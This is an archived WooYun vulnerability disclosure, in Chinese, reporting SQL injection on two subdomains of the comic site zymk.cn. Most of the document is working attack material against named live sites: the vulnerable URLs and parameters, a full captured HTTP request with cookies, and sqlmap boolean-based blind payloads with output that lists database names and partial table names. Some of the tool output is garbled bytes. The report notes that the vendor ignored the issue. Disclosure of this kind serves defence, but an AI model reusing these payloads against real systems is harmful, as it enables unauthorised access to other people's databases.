乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-02: 细节已通知厂商并且等待厂商处理中 2015-11-07: 厂商已经主动忽略漏洞,细节向公众公开
漫客网SQL注入
http://shop.zymk.cn/index.php/Tag/?id=2&order=listorder
sqlmap resumed the following injection point(s) from stored session:---Parameter: order (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: id=2&order=(SELECT (CASE WHEN (1825=1825) THEN 1825 ELSE 1825*(SELECT 1825 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))---[13:31:54] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0[13:31:54] [INFO] fetching database names[13:31:54] [INFO] fetching number of databases[13:31:54] [INFO] resumed: 2[13:31:54] [INFO] resumed: information_schema[13:31:54] [INFO] resumed: mkshopavailable databases [2]:[*] information_schema[*] mkshop
http://baike.zymk.cn/index.php?search-fulltext-title-1--all-0-within-time-desc-1
POST /index.php?search-default HTTP/1.1Host: baike.zymk.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Referer: http://baike.zymk.cn/index.php?doc-create.htmlCookie: BAIDU_DUP_lcr=http://www.baidu.com/link?url=Zjo417Xo1rTTvkH3nz19eSONwF-7YiqRO6ytC3XN6Ma&wd=&eqid=81757fa0000926ad00000005563444e9; Hm_lvt_bfeb001eb5a0b3162d945f1b9cdcb912=1446266096; Hm_lpvt_bfeb001eb5a0b3162d945f1b9cdcb912=1446269195; FX7m_3f67_saltkey=w4hcq4U3; FX7m_3f67_lastvisit=1446263008; FX7m_3f67_sid=y769HA; FX7m_3f67_lastact=1446268181%09misc.php%09seccode; FX7m_3f67_st_p=0%7C1446268175%7C4040132a2da2b28facae50f5f3ec46ac; FX7m_3f67_visitedfid=47D299D5472; FX7m_3f67_viewid=tid_596946; FX7m_3f67_seccode=6324.ec5df85813cf7859f6; TP_think_language=%22zh-CN%22; hd_sid=NkVt0X; hd_searchtime=1446267013; CNZZDATA1789733=cnzz_eid%3D1206615900-1446266704-%26ntime%3D1446266704; FX7m_3f67_home_readfeed=1446268160; FX7m_3f67_nofocus_home=1Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 19searchtext=1&full=1
参数full
sqlmap resumed the following injection point(s) from stored session:---Parameter: full (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: searchtext=1&full=1 AND 2105=2105---[13:35:35] [INFO] the back-end DBMS is Microsoft SQL Serverweb application technology: PHP 5.2.17back-end DBMS: Microsoft SQL Server 2008[13:35:35] [INFO] fetching database names[13:35:35] [INFO] fetching number of databases[13:35:35] [INFO] resumed: 4411[13:35:35] [INFO] resuming partial value: #\x13\x12\x12\n\tEE%##\x13\x12\x12\n\n\n\nER\tIEE%###\x13\x12\x12\n\n\tIF\tEE%%E%%%#\x13\x13\x12\x12\x12\x12\n\tIEEE%%#%%#####%%#%#####\x13\x13\x12\x13\x13\x13\x13\x12\x12\x12\x12\x12\n\x12\x12\x12\x13%##%EE%&\n\nIEE%##\x13\x13\x12\x13\x12\n\tIEE%##\x14\x13\x12\x12\n\tIEE%%##\x13\x13\x12\x12\n\n\tIIEE%##\x13\x12\x12\n\tE%%####\x13\x12\n\tIIEEE%#\x13\x12\x12\n\tEEE%##\x12\x12\x13\x13%IIEEEEE%%IM%E%#%#\x13\x13\x12\x12\x12\n\n\tIIK\x13\x12\x12\x12###\x13\x13#\x13\x13\x13\x12\x12\x12\tJ\tJ\x13*\n\n\tIIEEEIIEE%#\x13\x12\x12\n\tIIIE%E%#c#\x13E%##\x13\x12\x12\x12\n\n\tIE%%%%###\x13\x12\x12\x12\n\n\tIEE##\x13\x13\x13\x13\x12\x12\x12\n\tIEE%#%"\x13\x13\x12\n\tR\tEE#[13:35:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[13:35:35] [INFO] retrieved:
sqlmap resumed the following injection point(s) from stored session:---Parameter: order (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: id=2&order=(SELECT (CASE WHEN (1825=1825) THEN 1825 ELSE 1825*(SELECT 1825 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))---[13:36:16] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0[13:36:16] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables[13:36:16] [INFO] fetching tables for database: 'mkshop'[13:36:16] [INFO] fetching number of tables for database 'mkshop'[13:36:16] [INFO] resumed: 189[13:36:16] [INFO] resuming partial value: activi[13:36:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[13:36:16] [INFO] retrieved: ty_nu
跑的慢不深入
危害等级:无影响厂商忽略
忽略时间:2015-11-07 15:16
漏洞Rank:4 (WooYun评价)
暂无